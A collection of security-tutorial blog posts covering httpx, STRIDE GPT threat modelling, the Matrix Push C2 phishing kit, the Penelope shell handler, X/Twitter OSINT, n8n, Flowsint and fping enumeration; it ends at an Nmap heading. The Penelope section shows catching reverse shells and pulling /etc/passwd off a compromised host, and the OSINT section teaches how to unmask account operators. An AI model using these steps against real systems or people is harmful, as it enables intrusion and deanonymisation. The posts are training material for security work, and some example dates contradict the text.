Traditional HTTP probing tools are too slow and limited for the kind of large-scale reconnaissance that modern bug bounty and pentesting demands. Httpx provides a fast, flexible, and powerful solution that’s specifically designed for security researchers who need to quickly analyze hundreds or thousands of web targets while extracting comprehensive information about each one.

In this article, we covered how to install httpx, basic and advanced usage examples as well as shared ideas on how httpx might be used for vulnerability detections. This tool really fast and can significantly boost your productivity whether you’re conducting bug bounty hunting or web app security testing. Check this out, maybe it will find a place in your cyberwarriors toolbox.

Using Artificial Intelligence (AI) in Cybersecurity: Automate Threat Modeling with STRIDE GPT

28 November 2025 at 09:48

Welcome back, aspiring cyberwarriors!

The STRIDE methodology has been the gold standard for systematic threat identification, categorizing threats into Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. However, applying STRIDE effectively requires not just understanding these categories but also having the experience to identify how they manifest in specific application architectures.

To solve this problem, we have STRIDE GPT. By combining the analytical power of AI with the proven STRIDE methodology, this tool can generate comprehensive threat models, attack trees, and mitigation strategies in minutes rather than hours or days.

In this article, we’ll walk you through how to install STRIDE GPT, check out its features, and get you started using them. Let’s get rolling!

Step #1: Install STRIDE GPT

First, make certain you have Python 3.8 or later installed on your system.

pi> python3 –version

Now, clone the STRIDE GPT repository from GitHub.

pi > git clone https://github.com/mrwadams/stride-gpt.git

pi> cd stride-gpt

Next, install the required Python dependencies.

pi > pip3 install -r requirements.txt –break-system-packages

This installation process may take a few minutes.

Step #2: Configure Your Groq API Key

STRIDE GPT supports multiple AI providers including OpenAI, Anthropic, Google AI, Mistral, and Groq, as well as local hosting options through Ollama and LM Studio Server. In this example, I’ll be using Groq. Groq provides access to models like Llama 3.3 70B, DeepSeek R1, and Qwen3 32B through their Lightning Processing Units, which deliver inference speeds significantly faster than traditional GPU-based solutions. Besides that, Groq’s API is cost-effective compared to proprietary models.

To use STRIDE GPT with Groq, you need to obtain an API key from Groq. The tool supports loading API keys through environment variables, which is the most secure method for managing credentials. In the stride-gpt directory, you’ll find a file named .env.example. Copy this file to create your own .env file:

pi > cp .env.example .env

Now, open the .env file in your preferred text editor and add the API key.

Step #3: Launch STRIDE GPT

Start the application by running:

pi> python3 -m streamlit run main.py

Streamlit will start a local web server.

Once you copy the URL into your browser, you will see a dashboard similar to the one shown below.

In the STRIDE GPT sidebar, you’ll see a dropdown menu labeled “Select Model Provider”. Click on this dropdown and you’ll see options for OpenAI, Azure OpenAI, Google AI, Mistral AI, Anthropic, Groq, Ollama, and LM Studio Server.

Select “Groq” from this list. The interface will update to show Groq-specific configuration options. You’ll see a field for entering your API key. If you configured the .env file correctly in Step 2, this field should already be populated with your key. If not, you can enter it directly in the interface, though this is less secure as the key will only persist for your current session.

Below the API key field, you’ll see a dropdown for selecting the specific Groq model you want to use. For this tutorial, I selected Llama 3.3 70B.

Step #4: Describe Your Application

Now comes the critical part where you provide information about the application you want to threat model. The quality and comprehensiveness of your threat model depends heavily on the detail you provide in this step.

In the main area of the interface, you’ll see a text box labeled “Describe the application to be modelled”. This is where you provide a description of your application’s architecture, functionality, and security-relevant characteristics.

Let’s work through a practical example. Suppose you’re building a web-based project management application. Here’s the kind of description you should provide:

“This is a web-based project management application built with a React frontend and a Node.js backend API. The application uses JWT tokens for authentication, with tokens stored in HTTP-only cookies. Users can create projects, assign tasks to team members, upload file attachments, and generate reports. The application is internet-facing and accessible to both authenticated users and unauthenticated visitors who can view a limited public project showcase. The backend connects to a PostgreSQL database that stores user credentials, project data, task information, and file metadata. Actual file uploads are stored in an AWS S3 bucket. The application processes sensitive data including user email addresses, project details that may contain confidential business information, and file attachments that could contain proprietary documents. The application implements role-based access control with three roles: Admin, Project Manager, and Team Member. Admins can manage users and system settings, Project Managers can create and manage projects, and Team Members can view assigned tasks and update their status.”

The more specific you are, the more targeted and actionable your threat model will be.

Besides that, near the application description field, you’ll see several dropdowns that help STRIDE GPT understand your application’s security context.

Step #5: Generate Your Threat Model

With all the configuration complete and your application described, you’re ready to generate your threat model. Look for a button labeled “Generate Threat Model” and click it.

Once complete, you’ll see a comprehensive threat model organized by the STRIDE categories. For each category, the model will identify specific threats relevant to your application. Let’s look at what you might see for our project management application example:

Each threat includes a detailed description explaining how the attack could be carried out and what the impact would be.

Step #6: Generate an Attack Tree

Beyond the basic threat model, STRIDE GPT can generate attack trees that visualize how an attacker might chain multiple vulnerabilities together to achieve a specific objective.

The tool generates these attack trees in Mermaid diagram format, which renders as an interactive visual diagram directly in your browser.

Step #7: Review DREAD Risk Scores

STRIDE GPT implements the DREAD risk scoring model to help you prioritize which threats to address first.

The tool will analyze each threat and assign scores from 1 to 10 for five factors:

Damage: How severe would the impact be if the threat were exploited?

Reproducibility: How easy is it to reproduce the attack?

Exploitability: How much effort and skill would be required to exploit the vulnerability?

Affected Users: How many users would be impacted?

Discoverability: How easy is it for an attacker to discover the vulnerability?

The DREAD assessment appears in a table format showing each threat, its individual factor scores, and its overall risk score.

Step #8: Generate Mitigation Strategies

Identifying threats is only half the battle. You also need actionable guidance on how to address them. STRIDE GPT includes a feature to generate specific mitigation strategies for each identified threat.

Look for a button labeled “Mitigations” and click it.

These mitigation strategies are specific to your application’s architecture and the threats identified. They’re not generic security advice but targeted recommendations based on the actual risks in your system.

Step #8: Generate Gherkin Test Cases

One of the most innovative features of STRIDE GPT is its ability to generate Gherkin test cases based on the identified threats. Gherkin is a business-readable, domain-specific language used in Behavior-Driven Development to describe software behaviors without detailing how that behavior is implemented. These test cases can be integrated into your automated testing pipeline to ensure that the mitigations you implement actually work.

Look for a button labeled “Generate Test Cases”. When you click it, STRIDE GPT will create Gherkin scenarios for each major threat.

Summary

Traditional threat modeling takes a lot of time and requires experts, which stops many organizations from doing it well. STRIDE GPT makes threat modeling easier for everyone by using AI to automate the analysis while keeping the quality of the proven STRIDE method.

In this article, we checked out STRIDE GPT and went over its main features. No matter if you’re protecting a basic web app or a complicated microservices setup, STRIDE GPT gives you the analytical tools you need to spot and tackle security threats in a straightforward way.

Command and Control (C2): Using Browser Notifications as a Weapon

26 November 2025 at 10:16

Welcome back, my aspiring hackers!

Nowadays, we often discuss the importance of protecting our systems from malware and sophisticated attacks. We install antivirus software, configure firewalls, and maintain vigilant security practices. But what happens when the attack vector isn’t a malicious file or a network exploit, but rather a legitimate browser feature you’ve been trusting?

This is precisely the threat posed by a new command-and-control platform called Matrix Push C2. This browser-native, fileless framework leverages push notifications, fake alerts, and link redirects to target victims. The entire attack occurs through your web browser, without first infecting your system through traditional means.

In this article, we will explore the architecture of browser-based attacks and investigate how Matrix Push C2 weaponizes it. Let’s get rolling!

The Anatomy of a Browser-Based Attack

Matrix Push C2 abuses the web push notification system, a legitimate browser feature that websites use to send updates and alerts to users who have opted in. Attackers first trick users into allowing browser notifications through social engineering on malicious or compromised websites.

Once a user subscribes to the attacker’s notifications, the attacker can push out fake error messages or security alerts at will that look scarily real. These messages appear as if they are from the operating system or trusted software, complete with official-sounding titles and icons.

The fake alerts might warn about suspicious logins to your accounts, claim that your browser needs an urgent security update, or suggest that your system has been compromised and requires immediate action. Each notification includes a convenient “Verify” or “Update” button that, when clicked, takes the victim to a bogus site controlled by the attackers. This site might be a phishing page designed to steal credentials, or it might attempt to trick you into downloading actual malware onto your system. Because this whole interaction is happening through the browser’s notification system, no traditional malware file needs to be present on the system initially. It’s a fileless technique that operates entirely within the trusted confines of your web browser.

Inside the Attacker’s Command Center

Matrix Push C2 is offered as a malware-as-a-service kit to other threat actors, sold directly through crimeware channels, typically via Telegram and cybercrime forums. The pricing structure follows a tiered subscription model that makes it accessible to criminals at various levels of sophistication. According to BlackFog company, the Matrix Push C2 costs approximately $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year. Payments are accepted in cryptocurrency, and buyers communicate directly with the operator for access.

From the attacker’s perspective, the interface is intuitive. The campaign dashboard displays metrics like total clients, delivery success rates, and notification interaction statistics.

Source: BlackFog

As soon as a browser is enlisted by accepting the push notification subscription, it reports data back to the command-and-control server.

Source: BlackFog

Matrix Push C2 can detect the presence of browser extensions, including cryptocurrency wallets like MetaMask, identify the device type and operating system, and track user interactions with notifications. Essentially, as soon as the victim permits the notifications, the attacker gains a telemetry feed from that browser session.

Social Engineering at Scale

The core of the attack is social engineering, and Matrix Push C2 comes loaded with configurable templates to maximize the credibility of its fake messages. Attackers can easily theme their phishing notifications and landing pages to impersonate well-known companies and services. The platform includes pre-built templates for brands such as MetaMask, Netflix, Cloudflare, PayPal, and TikTok, each designed to look like a legitimate notification or security page from those providers.

Source: BlackFog

Because these notifications appear in the official notification area of the device, users may assume their own system or applications generated the alert.

Defending Against Browser-Based Command and Control

As cyberwarriors, we must adapt our defensive strategies to account for this new attack vector. The first line of defense is user education and awareness. Users need to understand that browser notification permission requests should be treated with the same skepticism as requests to download and run executable files. Just because a website asks for notification permissions doesn’t mean you should grant them. In fact, most legitimate websites function perfectly well without push notifications, and the feature is often more of an annoyance than a benefit. If you believe that your team needs to update their skills for current and upcoming threats, consider our recently published Security Awareness and Risk Management training.

Beyond user awareness, technical controls can help mitigate this threat. Browser policies in enterprise environments can be configured to block notification permissions by default or to whitelist only approved sites. Network security tools can monitor for connections to known malicious notification services or suspicious URL shortening domains.

Summary

The fileless, cross-platform nature of this attack makes it particularly dangerous and difficult to detect using traditional security tools. However, by combining user awareness, proper browser configuration, and anti-data exfiltration technology, we can defend against this threat.

In this article, we briefly explored how Matrix Push C2 operates, and it’s a first step in protecting yourself and your organization from this emerging attack vector.

Offensive Security: Get Started with Penelope for Advanced Shell Management

24 November 2025 at 17:02

Welcome back, aspiring cyberwarriors!

In the world of penetration testing and red team operations, one of the most critical moments comes after you’ve successfully exploited a target system. You’ve gained initial access, but now you’re stuck with a basic, unstable shell that could drop at any moment. You need to upgrade that shell, manage multiple connections, and maintain persistence without losing your hard-won access.

Traditional methods of shell management are fragmented and inefficient. You might use netcat for catching shells, then manually upgrade them with Python or script commands, manage them in separate terminal windows, and hope you don’t lose track of which shell connects to which target. Or you can use Penelope to handle all those things.

Penelope is a shell handler designed specifically for hackers who demand more from their post-exploitation toolkit. Unlike basic listeners like netcat, Penelope automatically upgrades shells to fully interactive TTYs, manages multiple sessions simultaneously, and provides a centralized interface for controlling all your compromised systems.

In this article, we will install Penelope and explore its core features. Let’s get rolling!

Step #1: Download and Install Penelope

In this tutorial, I will be installing Penelope on my Raspberry Pi 4, but the tool works equally well on any Linux distribution or MacOS system with Python 3.6 or higher installed. The installation process is straightforward since Penelope is a Python script

First, navigate to the GitHub repository and clone the project to your system:
pi> git clone https://github.com/brightio/penelope.git

pi> cd penelope

Once the downloading completes, you can verify that Penelope is ready to use by checking its help menu:

pi> python3 penelope.py -h

You should see a comprehensive help menu displaying all of Penelope’s options and capabilities. This confirms that the tool is properly installed and ready for use.

Step #2: Starting a Basic Listener

The most fundamental use case for Penelope is catching reverse shells from compromised targets. Unlike netcat, which simply listens on a port and displays whatever connects, Penelope manages the incoming connection and prepares it for interactive use.

To start a basic listener on port 4444, execute the following command:

pi> python3 penelope.py

Penelope will start listening on the default port and display a status message indicating it’s ready to receive connections.

Now let’s simulate a compromised target connecting back to your listener.

You should see Penelope display information about the new session, including an assigned session ID, the target’s IP address, and the detected operating system. The shell is automatically upgraded to a fully interactive TTY, meaning you now have tab completion, the ability to use text editors like Vim, and proper handling of special characters.

Step #3: Managing Multiple Sessions

Let’s simulate managing multiple targets. In the current session, click F12 to open a menu. There, you can type help for exploring available options.

We’re interested in adding a new listener, so the command will be:

panelope> listeners add -p <port>

Each time a new target connects, Penelope assigns it a unique session ID and adds it to your session list.

To view all active sessions, use the sessions command within Penelope:

penelope > sessions

This displays a table showing all connected targets with their session IDs, IP addresses and operating systems.

To interact with a specific session, use the session ID. For example, to switch to session 2:

penelope > interact 2

Step #4: Uploading and Downloading Files

File transfer is a constant requirement during penetration testing engagements. You need to upload exploitation tools, download sensitive data, and move files between your attack system and compromised targets. Penelope includes built-in file transfer capabilities that work regardless of what tools are available on the target system.

To upload a file from your attacking system to the target, use the upload command. Let’s say you want to upload a Python script called script.py to the target:

penelope > upload /home/air/Tools/script.py

Downloading files from the target works similarly. Suppose you’ve discovered a sensitive configuration file on the compromised system that you need to exfiltrate:

penelope > download /etc/passwd

Summary

Traditional tools like netcat provide basic listening capabilities but leave you manually managing shell upgrades, juggling terminal windows, and struggling to maintain organized control over your compromised infrastructure. Penelope solves these problems. It provides the control and organization you need to work efficiently and maintain access to your hard-won, compromised systems.

The tool’s automatic upgrade capabilities, multi-session management, built-in file transfer, and session persistence features make it a valuable go-to solution for cyberwarriors. Keep an eye on it—it may find a place in your hacking toolbox.

Open Source Intelligence (OSINT): Strategic Techniques for Finding Info on X (Twitter)

24 November 2025 at 10:34

Welcome back, my aspiring digital investigators!

In the rapidly evolving landscape of open source intelligence, Twitter (now rebranded as X) has long been considered one of the most valuable platforms for gathering real-time information, tracking social movements, and conducting digital investigations. However, the platform’s transformation under Elon Musk’s ownership has fundamentally altered the OSINT landscape, creating unprecedented challenges for investigators who previously relied on third-party tools and API access to conduct their research.

The golden age of Twitter OSINT tools has effectively ended. Applications like Twint, GetOldTweets3, and countless browser extensions that once provided investigators with powerful capabilities to search historical tweets, analyze user networks, and extract metadata have been rendered largely useless by the platform’s new API restrictions and authentication requirements. What was once a treasure trove of accessible data has become a walled garden, forcing OSINT practitioners to adapt their methodologies and embrace more sophisticated, indirect approaches to intelligence gathering.

This fundamental shift represents both a challenge and an opportunity for serious digital investigators. While the days of easily scraping massive datasets are behind us, the platform still contains an enormous wealth of information for those who understand how to access it through alternative means. The key lies in understanding that modern Twitter OSINT is no longer about brute-force data collection, but rather about strategic, targeted analysis using techniques that work within the platform’s new constraints.

Understanding the New Twitter Landscape

The platform’s new monetization model has created distinct user classes with different capabilities and visibility levels. Verified subscribers enjoy enhanced reach, longer post limits, and priority placement in replies and search results. This has created a new dynamic where information from paid accounts often receives more visibility than content from free users, regardless of its accuracy or relevance. For OSINT practitioners, this means understanding these algorithmic biases is essential for comprehensive intelligence gathering.

The removal of legacy verification badges and the introduction of paid verification has also complicated the process of source verification. Previously, blue checkmarks provided a reliable indicator of account authenticity for public figures, journalists, and organizations. Now, anyone willing to pay can obtain verification, making it necessary to develop new methods for assessing source credibility and authenticity.

Content moderation policies have also evolved significantly, with changes in enforcement priorities and community guidelines affecting what information remains visible and accessible. Some previously available content has been removed or restricted, while other types of content that were previously moderated are now more readily accessible. Also, the company updated its terms of service to officially say it uses public tweets to train its AI.

Search Operators

The foundation of effective Twitter OSINT lies in knowing how to craft precise search queries using X’s advanced search operators. These operators allow you to filter and target specific information with remarkable precision.

You can access the advanced search interface through the web version of X, but knowing the operators allows you to craft complex queries directly in the search bar.

Here are some of the most valuable search operators for OSINT purposes:

from:username – Shows tweets only from a specific user

to:username – Shows tweets directed at a specific user

since:YYYY-MM-DD – Shows tweets after a specific date

until:YYYY-MM-DD – Shows tweets before a specific date

near:location within:miles – Shows tweets near a location

filter:links – Shows only tweets containing links

filter:media – Shows only tweets containing media

filter:images – Shows only tweets containing images

filter:videos – Shows only tweets containing videos

filter:verified – Shows only tweets from verified accounts

-filter:replies – Excludes replies from search results

#hashtag – Shows tweets containing a specific hashtag

"exact phrase" – Shows tweets containing an exact phrase

For example, to find tweets from a specific user about cybersecurity posted in the first half of 2025, you could use:

from:username cybersecurity since:2024-01-01 until:2024-06-30

The power of these operators becomes apparent when you combine them. For instance, to find tweets containing images posted near a specific location during a particular event:

near:Moscow within:5mi filter:images since:2023-04-15 until:2024-04-16 drone

This would help you find images shared on X during the drone attack on Moscow.

Profile Analysis and Behavioral Intelligence

Every Twitter account leaves digital fingerprints that tell a story far beyond what users intend to reveal.

The Account Creation Time Signature

Account creation patterns often expose coordinated operations with startling precision. During investigation of a corporate disinformation campaign, researchers discovered 23 accounts created within a 48-hour window in March 2023—all targeting the same pharmaceutical company. The accounts had been carefully aged for six months before activation, but their synchronized birth dates revealed centralized creation despite using different IP addresses and varied profile information.

Username Evolution Archaeology: A cybersecurity firm tracking ransomware operators found that a key player had changed usernames 14 times over two years, but each transition left traces. By documenting the evolution @crypto_expert → @blockchain_dev → @security_researcher → @threat_analyst, investigators revealed the account operator’s attempt to build credibility in different communities while maintaining the same underlying network connections.

Visual Identity Intelligence: Profile image analysis has become remarkably sophisticated. When investigating a suspected foreign influence operation, researchers used reverse image searches to discover that 8 different accounts were using professional headshots from the same stock photography session—but cropped differently to appear unrelated. The original stock photo metadata revealed it was purchased from a server in Eastern Europe, contradicting the accounts’ claims of U.S. residence.

Temporal Behavioral Fingerprinting

Human posting patterns are as unique as fingerprints, and investigators have developed techniques to extract extraordinary intelligence from timing data alone.

Geographic Time Zone Contradictions: Researchers tracking international cybercriminal networks identified coordination patterns across supposedly unrelated accounts. Five accounts claiming to operate from different U.S. cities all showed posting patterns consistent with Central European Time, despite using location-appropriate slang and cultural references. Further analysis revealed they were posting during European business hours while American accounts typically show evening and weekend activity.

Automation Detection Through Micro-Timing: A social media manipulation investigation used precise timestamp analysis to identify bot behavior. Suspected accounts were posting with unusual regularity—exactly every 3 hours and 17 minutes for weeks. Human posting shows natural variation, but these accounts demonstrated algorithmic precision that revealed automated management despite otherwise convincing content.

Network Archaeology and Relationship Intelligence

Twitter’s social graph remains one of its most valuable intelligence sources, requiring investigators to become expert relationship analysts.

The Early Follower Principle: When investigating anonymous accounts involved in political manipulation, researchers focus on the first 50 followers. These early connections often reveal real identities or organizational affiliations before operators realize they need operational security. In one case, an anonymous political attack account’s early followers included three employees from the same PR firm, revealing the operation’s true source.

Mutual Connection Pattern Analysis: Intelligence analysts investigating foreign interference discovered sophisticated relationship mapping. Suspected accounts showed carefully constructed following patterns—they followed legitimate journalists, activists, and political figures to appear authentic, but also maintained subtle connections to each other through shared follows of obscure accounts that served as coordination signals.

Reply Chain Forensics: A financial fraud investigation revealed coordination through reply pattern analysis. Seven accounts engaged in artificial conversation chains to boost specific investment content. While the conversations appeared natural, timing analysis showed responses occurred within 30-45 seconds consistently—far faster than natural reading and response times for the complex financial content being discussed.

Systematic Documentation and Intelligence Development

The most successful profile analysis investigations employ systematic documentation techniques that build comprehensive intelligence over time rather than relying on single-point assessments.

Behavioral Baseline Establishment: Investigators spend 2-4 weeks establishing normal behavioral patterns before conducting anomaly analysis. This baseline includes posting frequency, engagement patterns, topic preferences, language usage, and network interaction patterns. Deviations from established baselines indicate potential significant developments.

Multi-Vector Correlation Analysis: Advanced investigations combine temporal, linguistic, network, and content analysis to build confidence levels in conclusions. Single indicators might suggest possibilities, but convergent evidence from multiple analysis vectors provides actionable intelligence confidence levels above 85%.

Summary

Predictive Behavior Modeling: The most sophisticated investigators use historical pattern analysis to predict likely future behaviors and optimal monitoring strategies. Understanding individual behavioral patterns enables investigators to anticipate when targets are most likely to post valuable intelligence or engage in significant activities.

Modern Twitter OSINT now requires investigators to develop cross-platform correlation skills and collaborative intelligence gathering approaches. While the technical barriers have increased significantly, the platform remains valuable for those who understand how to leverage remaining accessible features through creative, systematic investigation techniques.

To improve your OSINT skills, check out our OSINT Investigator Bundle. You’ll explore both fundamental and advanced techniques and receive an OSINT Certified Investigator Voucher.

Automating Your Digital Life with n8n

21 November 2025 at 10:09

Welcome back, aspiring cyberwarriors!

As you know, there are plenty of automation tools out there, but most of them are closed-source, cloud-only services that charge you per operation and keep your data on their servers. For those of us who value privacy and transparency, these solutions simply won’t do. That’s where n8n comes into the picture – a free, private workflow automation platform that you can self-host on your own infrastructure while maintaining complete control over your data.

In this article, we explore n8n, set it up on a Raspberry Pi, and create a workflow for monitoring security news and sending it to Matrix. Let’s get rolling!

What is n8n?

n8n is a workflow automation platform that combines AI capabilities with business process automation, giving technical teams the flexibility of code with the speed of no-code. The platform uses a visual node-based interface where each node represents a specific action, for example, reading an RSS feed, sending a message, querying a database, or calling an API. When you connect these nodes, you create a workflow that executes automatically based on triggers you define.

With over 400 integrations, native AI capabilities, and a fair-code license, n8n lets you build powerful automation while maintaining full control over your data and deployments.

The Scenario: RSS Feed Monitoring with Matrix Notifications

For this tutorial, we’re going to build a practical workflow that many security professionals and tech enthusiasts need: automatically monitoring RSS feeds from security news sites and threat intelligence sources, then sending new articles directly to a Matrix chat room. Matrix is an open-source, decentralized communication protocol—essentially a privacy-focused alternative to Slack or Discord that you can self-host.

Step #1: Installing n8n on Raspberry Pi

Let’s get started by setting up n8n on your Raspberry Pi. First, we need to install Docker, which is the easiest way to run n8n on a Raspberry Pi. SSH into your Pi and run these commands:

pi> curl -fsSL https://get.docker.com -o get-docker.sh
pi> sudo sh get-docker.sh
pi> sudo usermod -aG docker pi

Log out and back in for the group changes to take effect. Now we can run n8n with Docker in a dedicated directory:

pi> sudo mkdir -p /opt/n8n/data


pi> sudo chown -R 1000:1000 /opt/n8n/data


pi> sudo docker run -d –restart unless-stopped –name n8n \
-p 5678:5678 \
-v ~/.n8n:/home/node/.n8n \
-e N8N_SECURE_COOKIE=false \
n8nio/n8n

This command runs n8n as a background service that automatically restarts if it crashes or when your Pi reboots. It maps port 5678 so you can access the n8n interface, and it creates a persistent volume at /opt/n8n/data to store your workflows and credentials so they survive container restarts. Also, the service doesn’t require an HTTPS connection; HTTP is enough.

Give it a minute to download and start, then open your web browser and navigate to http://your-raspberry-pi-ip:5678. You should see the n8n welcome screen asking you to create your first account.

Step #2: Understanding the n8n Interface

Once you’re logged in and have created your first workflow, you’ll see the n8n canvas—a blank workspace where you’ll build your workflows. The interface is intuitive, but let me walk you through the key elements.

On the right side, you’ll see a list of available nodes organized by category (Tab key). These are the building blocks of your workflows. There are trigger nodes that start your workflow (like RSS Feed Trigger, Webhook, or Schedule), action nodes that perform specific tasks (like HTTP Request or Function), and logic nodes that control flow (like IF conditions and Switch statements).

The main canvas in the center is where you’ll drag and drop nodes and connect them. Each connection represents data flowing from one node to the next. When a workflow executes, data passes through each node in sequence, getting transformed and processed along the way.

Step #3: Creating Your First Workflow – RSS to Matrix

Now let’s build our RSS monitoring workflow. Click the “Add workflow” button to create a new workflow. Give it a meaningful name like “Security RSS to Matrix”.

We’ll start by adding our trigger node. Click the plus icon on the canvas and search for “RSS Feed Trigger”. Select it and you’ll see the node configuration panel open on the right side.

In the RSS Feed Trigger node configuration, you need to specify the RSS feed URL you want to monitor. For this example, let’s use the Hackers-Arise feed.

The RSS Feed Trigger has several important settings. The Poll Times setting determines how often n8n checks the feed for new items. You can set it to check every hour, every day, or on a custom schedule. For a security news feed, checking every hour makes sense, so you get timely notifications without overwhelming your Matrix room.

Click “Execute Node” to test it. You should see the latest articles from the feed appear in the output panel. Each article contains data like title, link, publication date, and sometimes the author. This data will flow to the next nodes in your workflow.

Step #4: Configuring Matrix Integration

Now we need to add the Matrix node to send these articles to your Matrix room. Click the plus icon to add a new node and search for “Matrix”. Select the Matrix node and “Create a message” as the action.

Before we can use the Matrix node, we need to set up credentials. Click on “Credential to connect with” and select “Create New”. You’ll need to provide your Matrix homeserver URL, your Matrix username, and password or access token.

Now comes the interesting part—composing the message. n8n uses expressions to pull data from previous nodes. In the message field, you can reference data from the RSS Feed Trigger using expressions like {{ $json.title }} and {{ $json.link }}.

Here’s a good message template that formats the RSS articles nicely:

🔔 New Article: {{ $json.title }}

{{ $json.description }}

🔗 Read more: {{ $json.link }}

Step #5: Testing and Activating Your Workflow

Click the “Execute Workflow” button at the top. You should see the workflow execute, data flow through the nodes, and if everything is configured correctly, a message will appear in your Matrix room with the latest RSS article.

Once you’ve confirmed the workflow works correctly, activate it by clicking the toggle switch at the top of the workflow editor.

The workflow is now running automatically! The RSS Feed Trigger will check for new articles according to the schedule you configured, and each new article will be sent to your Matrix room.

Summary

The workflow we built today, monitoring RSS feeds and sending security news to Matrix, demonstrates n8n’s practical value. Whether you’re aggregating threat intelligence, monitoring your infrastructure, managing your home lab, or just staying on top of technology news, n8n can eliminate the tedious manual work that consumes so much of our time.

Open Source Intelligence (OSINT): Using Flowsint for Graph-Based Investigations

19 November 2025 at 10:54

Welcome back, aspiring cyberwarriors!

In our industry, we often find ourselves overwhelmed by data from numerous sources. You might be tracking threat actors across social media platforms, mapping domain infrastructure for a penetration test, investigating cryptocurrency transactions tied to ransomware operations, or simply trying to understand how different pieces of intelligence connect to reveal the bigger picture. The challenge is not finding data but making sense of it all. Traditional OSINT tools come and go, scripts break when APIs change, and your investigation notes end up scattered across spreadsheets, text files, and fragile Python scripts that stop working the moment a service updates its interface.

As you know, the real value in intelligence work is not in collecting isolated data points but in understanding the relationships between them. A domain by itself tells you little. But when you can see that a domain connected to an IP address, that IP is tied to an ASN owned by a specific organization, that organization is linked to social media accounts, and those accounts are associated with known threat actors, suddenly you have actionable intelligence. The problem is that most OSINT tools force you to work in silos. You run one tool to enumerate subdomains, another to check WHOIS records, and a third to search for breaches. Then, you manually try to piece it all together in your head or in a makeshift spreadsheet.

To solve these problems, we’re going to explore a tool called Flowsint – an open-source graph-based investigation platform. Let’s get rolling!

Step #1: Install Prerequisites

Before we can run Flowsint, we need to make certain we have the necessary prerequisites installed on our system. Flowsint uses Docker to containerize all its components. You will also need Make, a build automation tool that builds executable programs and libraries from source code.

In this tutorial, I will be installing Flowsint on my Raspberry Pi 4 system, but the instructions are nearly identical for use with other operating systems as long as you have Docker and Make installed.

First, make certain you have Docker installed.
kali> docker –version

Next, make sure you have Make installed.
kali > make –version

Now that we have our prerequisites in place, we are ready to download and install Flowsint.

Step #2: Clone the Flowsint Repository

Flowsint is hosted on GitHub as an open-source project. Clone the repository with the following command:
kali > git clone https://github.com/reconurge/flowsint.git
kali > cd flowsint

To install and start Flowsint in production mode, simply run:
kali > make prod

This command will do several things. It will build the Docker images for all the Flowsint components, start the necessary containers, including the Neo4j graph database, PostgreSQL database for user management, the FastAPI backend server, and the frontend application. It will also configure networking between the containers and set up the initial database schemas.

The first time you run this command, it may take several minutes to complete as Docker downloads base images and builds the Flowsint containers. You should see output in your terminal showing the progress of each build step. Once the installation completes, all the Flowsint services will be running in the background.

You can verify that the containers are running with:
kali > docker ps

Step #3: Create Your Account

With Flowsint now running, we can access the web interface and create our first user account. Open your web browser and navigate to: http://localhost:5173/register

Once you have filled in the registration form and logged in, you will now see the main interface, where you can begin building your investigations.

Step #4 Creating Your First Investigation

Let’s create a simple investigation to see how Flowsint works in practice.

After creating the investigation, we can view analytics about it and, most importantly, create our first sketch using the panel on the left. Sketches allow you to organize and visualize your data as a graph.

After creating the sketch, we need to add our first node to the ‘items’ section. In this case, let’s use a domain name.

Enter a domain name you want to investigate. For this tutorial, I will use a lenta.ru domain.

You should now see a node appear on the graph canvas representing your domain. Click on this node to select it and view the available transforms. You will see a list of operations you can perform on this domain entity.

Step #5 Running Transforms to Discover Relationships

Now that we have a domain entity in our graph, let’s run some transforms to discover related infrastructure and build out our investigation.

With your domain entity selected, look for the transform that will resolve the domain to its IP addresses. Flowsint will query DNS servers to find the IP addresses associated with your domain and create new IP entities in your graph connected to the domain with a relationship indicating the DNS resolution.

Let’s run another transform. Select your domain entity again, and this time run the WHOIS Lookup transform. This transform will query WHOIS databases to get domain registration information, including the registrar, registration date, expiration date, and sometimes contact information for the domain owner.

Now select one of the IP address entities that was discovered. You should see a different set of available transforms specific to IP addresses. Run the IP Information transform. This transform will get geolocation and network details for the IP address, including the country, city, ISP, and other relevant information.

Step #6 Chaining Transforms for Deeper Investigation

One of the powerful features of Flowsint is the ability to chain transforms together to automate complex investigation workflows. Instead of manually running each transform one at a time, you can set up sequences of transforms that execute automatically.

Let’s say you want to investigate not just a single domain but all the subdomains associated with it. Select your original domain entity and run the Domain to Subdomains transform. This transform will enumerate subdomains using various techniques, including DNS brute forcing, certificate transparency logs, and other sources.

Each discovered subdomain will appear as a new domain entity in your graph, connected to the parent domain.

Step #7 Investigating Social Media and Email Connections

Flowsint is not limited to technical infrastructure investigation. It also includes transforms for investigating individuals, organizations, social media accounts, and email addresses.

Let’s add an email address entity to our graph. In the sidebar, select the email entity type and enter an email address associated with your investigation target.

Once you have created the email entity, select it and look at the available transforms. You will see several options, including Email to Gravatar, Email to Breaches, and Email to Domains.

Summary

In many cases, cyberwarriors must make sense of vast amounts of interconnected data from diverse sources. A platform such as Flowsint provides the durable foundation we need to conduct comprehensive investigations that remain stable even as tools and data sources evolve around it.

Whether you are investigating threat actors, mapping infrastructure, tracking cryptocurrency flows, or uncovering human connections, Flowsint gives you the power to connect the dots and see the truth.

Hacking with the Raspberry Pi: Network Enumeration

17 November 2025 at 10:03

Welcome back, my aspiring cyberwarriors!

We continue exploring the Raspberry Pi’s potential for hacking. In this article, we’ll dive into network enumeration.

Enumeration is the foundational step of any penetration test—it involves systematically gathering detailed information about the hosts, services, and topology of the network you’re targeting. For the purposes of this guide, we’ll assume that you already have a foothold within the network—whether through physical proximity, compromised credentials, or another form of access—allowing you to apply a range of enumeration techniques.

Let’s get started!

Step #1: Fping

To get started, we’ll examine a lightweight utility called fping. It leverages the Internet Control Message Protocol (ICMP) echo request to determine whether a target host is responding. Unlike the traditional ping command, fping lets you specify any number of targets directly on the command line—or supply a file containing a list of targets to probe. This allows us to do a basic network discovery.

Fping comes preinstalled on Kali Linux. To confirm that it’s available and view its options, you can display the help page.

kali> fping -h

To run a quiet scan, we can use the following command:

kali> sudo fping -I wlan0 -q -a -g 192.168.0.0/24

This command runs fping with root privileges to quietly scan all IP addresses in the 192.168.0.0/24 network via the wlan0 interface, showing only the IPs that respond (i.e., hosts that are alive). At this point, we can see which systems are live on the network and are ready to be exploited. At its core, fping is very lightweight; when I ran htop and fping simultaneously, I observed the following output:

As you can see, CPU usage is around 2% and less than 1% of memory usage in my case (my Pi board has 4 cores and 2GB of RAM).

Step #2: Nmap

